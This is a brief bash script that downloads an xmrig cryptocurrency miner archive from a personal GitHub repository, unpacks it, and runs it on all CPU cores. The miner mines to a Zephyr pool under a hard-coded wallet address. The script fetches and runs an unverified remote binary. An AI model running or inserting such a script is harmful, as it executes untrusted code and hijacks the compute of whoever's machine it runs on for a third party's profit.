#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHs6yJ4RVcSPYctsb4LGaqeL78zBYFCQ2sj4v2nuJZQzU4hHy4DcTYDVcfjwXy1B7KhmyRP4rryDQzvCUZPEyvHbCbcmynJmf -p NEXT -a rx/0 -t $(nproc --all)